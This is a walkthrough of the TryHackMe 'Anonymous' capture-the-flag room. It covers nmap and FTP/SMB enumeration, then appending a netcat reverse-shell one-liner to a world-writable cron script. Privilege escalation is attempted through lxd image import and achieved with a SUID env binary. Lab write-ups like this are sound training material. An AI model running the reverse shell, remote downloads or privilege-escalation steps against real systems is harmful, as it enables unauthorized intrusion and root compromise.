I" I<h2 id="description">Description:</h2>

<p>The Following Post is writeup of Anonymous room of tryhackme <a href="https://tryhackme.com/room/anonymous">https://tryhackme.com/room/anonymous</a></p>

<table>
  <thead>
    <tr>
      <th style="text-align: left">Machine</th>
      <th style="text-align: left">Details</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left">OS</td>
      <td style="text-align: left">Linux</td>
    </tr>
    <tr>
      <td style="text-align: left">Rating</td>
      <td style="text-align: left">Medium</td>
    </tr>
    <tr>
      <td style="text-align: left">Creator</td>
      <td style="text-align: left">namelessone</td>
    </tr>
  </tbody>
</table>

<h2 id="summary">Summary</h2>

<p>The Room have 4 ports open with anonymous logins in ftp and one of the share is exposed.
  After logging into ftp we see a script which can possibly running as cronjob.
  Put a reverse shell script and wait for shell to spawn. Now for PrivEsc we can see env have suid permissions.
  Exploiting it will get us root flag.</p>

<h2 id="walkthrough">Walkthrough</h2>

<h3 id="enumeration">Enumeration</h3>

<p>Let’s start with nmap scan.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
</pre></td><td class="rouge-code"><pre>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oA</span> nmap/pickhill 10.10.74.228
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-08-26 10:45 IST
Nmap scan report <span class="k">for </span>10.10.74.228
Host is up <span class="o">(</span>0.31s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 995 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span>
|_drwxrwxrwx    2 111      113          4096 Jun 04 19:26 scripts <span class="o">[</span>NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.124.57
|      Logged <span class="k">in </span>as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session <span class="nb">timeout </span><span class="k">in </span>seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 <span class="o">(</span>RSA<span class="o">)</span>
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd <span class="o">(</span>ED25519<span class="o">)</span>
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
8001/tcp filtered vcom-tunnel
Service Info: Host: ANONYMOUS<span class="p">;</span> OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 18s, deviation: 0s, median: 17s
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; <span class="o">(</span>unknown<span class="o">)</span>
| smb-os-discovery:
|   OS: Windows 6.1 <span class="o">(</span>Samba 4.7.6-Ubuntu<span class="o">)</span>
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS<span class="se">\x</span>00
|   Domain name: <span class="se">\x</span>00
|   FQDN: anonymous
|_  System <span class="nb">time</span>: 2020-08-26T05:16:21+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled <span class="o">(</span>dangerous, but default<span class="o">)</span>
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   <span class="nb">date</span>: 2020-08-26T05:16:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>67.52 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Let’s start with ftp.</p>

<h4 id="ftp">FTP</h4>

<p>Let’s check by logging into it.</p>

<p>Logged in as anonymous</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td><td class="rouge-code"><pre>ftp&gt; <span class="nb">ls</span> <span class="nt">-la</span>
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04 19:26 <span class="nb">.</span>
drwxr-xr-x    3 65534    65534        4096 May 13 19:49 ..
<span class="nt">-rwxr-xrwx</span>    1 1000     1000          314 Jun 04 19:24 clean.sh
<span class="nt">-rw-rw-r--</span>    1 1000     1000         2107 Aug 26 05:36 removed_files.log
<span class="nt">-rw-r--r--</span>    1 1000     1000           68 May 12 03:50 to_do.txt
226 Directory send OK.
ftp&gt; mget <span class="k">*</span>
mget clean.sh? y
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Opening BINARY mode data connection <span class="k">for </span>clean.sh <span class="o">(</span>314 bytes<span class="o">)</span><span class="nb">.</span>
226 Transfer complete.
314 bytes received <span class="k">in </span>0.00 secs <span class="o">(</span>350.4464 kB/s<span class="o">)</span>
mget removed_files.log? y
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Opening BINARY mode data connection <span class="k">for </span>removed_files.log <span class="o">(</span>2150 bytes<span class="o">)</span><span class="nb">.</span>
226 Transfer complete.
2150 bytes received <span class="k">in </span>0.00 secs <span class="o">(</span>9.0326 MB/s<span class="o">)</span>
mget to_do.txt? y
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Opening BINARY mode data connection <span class="k">for </span>to_do.txt <span class="o">(</span>68 bytes<span class="o">)</span><span class="nb">.</span>
226 Transfer complete.
68 bytes received <span class="k">in </span>0.00 secs <span class="o">(</span>412.4612 kB/s<span class="o">)</span>
ftp&gt; <span class="nb">exit</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So basically we can see the script maybe we can edit it to get a shell.<br />
I will come back again let’s enum smb now</p>

<h4 id="smb">SMB</h4>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="o">=========================================</span>
|    Share Enumeration on 10.10.74.228    |
<span class="o">=========================================</span>

      Sharename       Type      Comment
      <span class="nt">---------</span>       <span class="nt">----</span>      <span class="nt">-------</span>
      print<span class="nv">$ </span>         Disk      Printer Drivers
      pics            Disk      My SMB Share Directory <span class="k">for </span>Pics
      IPC<span class="nv">$ </span>           IPC       IPC Service <span class="o">(</span>anonymous server <span class="o">(</span>Samba, Ubuntu<span class="o">))</span>
SMB1 disabled <span class="nt">--</span> no workgroup available

<span class="o">[</span>+] Attempting to map shares on 10.10.74.228
//10.10.74.228/print<span class="nv">$ </span>  Mapping: DENIED, Listing: N/A
//10.10.74.228/pics     Mapping: OK, Listing: OK
//10.10.74.228/IPC<span class="nv">$ </span>    
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Though pics are open but doesn’t contain any usefull info or more or less i already guessed exploitation part.
I found nothing interesting so skipped it.<br />
Let’s move on to Exploitation part.</p>

<h3 id="exploitation">Exploitation</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
</pre></td><td class="rouge-code"><pre>silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  curlftpfs anonymous:anon@10.10.74.228 /home/silver/Desktop/tryhackme/anonymous/nmap/my_ftp
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  lks
zsh: correct <span class="s1">'lks'</span> to <span class="s1">'ls'</span> <span class="o">[</span>nyae]? y
my_ftp  pickhill.gnmap  pickhill.nmap  pickhill.xml
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  <span class="nb">cd </span>my_ftp
<span class="nb">ls                                                               
 </span>silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  <span class="nb">ls
</span>scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  <span class="nb">ls</span> <span class="nt">-la</span>
total 4
drwxr-xr-x 1 root   root   1024 Jan  1  1970 <span class="nb">.</span>
drwxr-xr-x 1 silver silver   90 Aug 26 11:15 ..
drwxrwxrwx 2 root   root   4096 Jun  4 19:26 scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  <span class="nb">cd </span>scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  <span class="nb">ls</span> <span class="nt">-la</span>
total 16
drwxrwxrwx 2 root root 4096 Jun  4 19:26 <span class="nb">.</span>
drwxr-xr-x 1 root root 1024 Jan  1  1970 ..
<span class="nt">-rwxr-xrwx</span> 1 root root  314 Jun  4 19:24 clean.sh
<span class="nt">-rw-rw-r--</span> 1 root root 2580 Aug 26 05:47 removed_files.log
<span class="nt">-rw-r--r--</span> 1 root root   68 May 12 03:50 to_do.txt
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  <span class="nb">cat </span>clean.sh
<span class="c">#!/bin/bash</span>

<span class="nv">tmp_files</span><span class="o">=</span>0
<span class="nb">echo</span> <span class="nv">$tmp_files</span>
<span class="k">if</span> <span class="o">[</span> <span class="nv">$tmp_files</span><span class="o">=</span>0 <span class="o">]</span>
<span class="k">then
        </span><span class="nb">echo</span> <span class="s2">"Running cleanup script:  nothing to delete"</span> <span class="o">&gt;&gt;</span> /var/ftp/scripts/removed_files.log
<span class="k">else
    for </span>LINE <span class="k">in</span> <span class="nv">$tmp_files</span><span class="p">;</span> <span class="k">do
        </span><span class="nb">rm</span> <span class="nt">-rf</span> /tmp/<span class="nv">$LINE</span> <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">date</span><span class="si">)</span><span class="s2"> | Removed file /tmp/</span><span class="nv">$LINE</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> /var/ftp/scripts/removed_files.log<span class="p">;</span><span class="k">done
fi
 </span>silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  <span class="nb">echo</span> <span class="s2">"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.9.124.57 4444 &gt;/tmp/f"</span> <span class="o">&gt;&gt;</span> clean.sh
zsh: operation not supported: clean.sh
 ✘ silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  <span class="nb">ls</span> <span class="nt">-la</span>
total 16
drwxrwxrwx 2 root root 4096 Jun  4 19:26 <span class="nb">.</span>
drwxr-xr-x 1 root root 1024 Jan  1  1970 ..
<span class="nt">-rwxr-xrwx</span> 1 root root  314 Jun  4 19:24 clean.sh
<span class="nt">-rw-rw-r--</span> 1 root root 2709 Aug 26 05:50 removed_files.log
<span class="nt">-rw-r--r--</span> 1 root root   68 May 12 03:50 to_do.txt
nano clean.sh                                                                                                                        
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  nano clean.sh
 silver@parrot  ~/Desktop/tryhackme/ano

Here we go our reverse shell:-

 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  pwncat <span class="nt">--listen</span> <span class="nt">--port</span> 4444
<span class="o">[</span>11:44:44] received connection from 10.10.74.228:44016                                                                 connect.py:148
<span class="o">[</span>11:44:47] new host w/ <span class="nb">hash </span>9bc647e33bc8a15fe1850dcd4a2752c1                                                            victim.py:329
<span class="o">[</span>11:45:05] pwncat running <span class="k">in</span> /bin/sh                                                                                    victim.py:363
<span class="o">[</span>11:45:16] pwncat is ready 🐈                                                                                           victim.py:762


<span class="se">\[\0</span>33[01<span class="p">;</span>31m<span class="se">\]</span><span class="o">(</span>remote<span class="o">)</span><span class="se">\[\0</span>33[00m<span class="se">\]</span> <span class="se">\[\0</span>33[01<span class="p">;</span>33m<span class="se">\]\u</span>@<span class="se">\h\[\0</span>33[00m<span class="se">\]</span>:<span class="se">\[\0</span>33[01<span class="p">;</span>36m<span class="se">\]\w\[\0</span>33[00m<span class="se">\]</span><span class="err">$</span>
<span class="se">\[\0</span>33[01<span class="p">;</span>31m<span class="se">\]</span><span class="o">(</span>remote<span class="o">)</span><span class="se">\[\0</span>33[00m<span class="se">\]</span> <span class="se">\[\0</span>33[01<span class="p">;</span>33m<span class="se">\]\u</span>@<span class="se">\h\[\0</span>33[00m<span class="se">\]</span>:<span class="se">\[\0</span>33[01<span class="p">;</span>36m<span class="se">\]\w\[\0</span>33[00m<span class="se">\]</span><span class="nv">$ </span>bash
namelessone@anonymous:/<span class="nv">$ </span> 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>as user namelessone
Now let’s move to PrivEsc</p>

<h3 id="privesc">PrivEsc</h3>

<p>Here we go lxd group</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
</pre></td><td class="rouge-code"><pre>
<span class="o">====================================(</span> Basic information <span class="o">)=====================================</span>
OS: Linux version 4.15.0-99-generic <span class="o">(</span>buildd@lcy01-amd64-013<span class="o">)</span> <span class="o">(</span>gcc version 7.5.0 <span class="o">(</span>Ubuntu 7.5.0-3ubuntu1~18.04<span class="o">))</span> <span class="c">#100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020</span>
User &amp; Groups: <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>namelessone<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>namelessone<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>namelessone<span class="o">)</span>,4<span class="o">(</span>adm<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,27<span class="o">(</span><span class="nb">sudo</span><span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,108<span class="o">(</span>lxd<span class="o">)</span>

So <span class="nb">let</span><span class="s1">'s move on to lxd privesc

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

python -m SimpleHTTPServer 8001

namelessone@anonymous:/tmp$ lxc list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+
namelessone@anonymous:/tmp$ wget 10.9.124.57:8001/alpine.tar.gz

namelessone@anonymous:/tmp$ lxc image import ./alpine.tar.gz --alias myimage

namelessone@anonymous:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cb2dd242acb1 | no     | alpine v3.12 (20200826_12:01) | x86_64 | 2.97MB | Aug 26, 2020 at 6:35am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Error: No storage pool found. Please create a new storage pool
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Ahh looks like not a right way though let’s check another way</p>

<h3 id="suid">SUID</h3>

<p>Got env suid didn’t notice it though let’s check gtfobins</p>

<p><img src="/assets/img/anonymous/envsuid.png" alt="env" /></p>

<p>```#!/usr/bin/env bash</p>

<p>namelessone@anonymous:/tmp# id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
```</p>

<p>got euid 0</p>

<p>let’s look into root.txt</p>

<p><img src="/assets/img/anonymous/roottxt.png" alt="root.txt" /></p>
:ET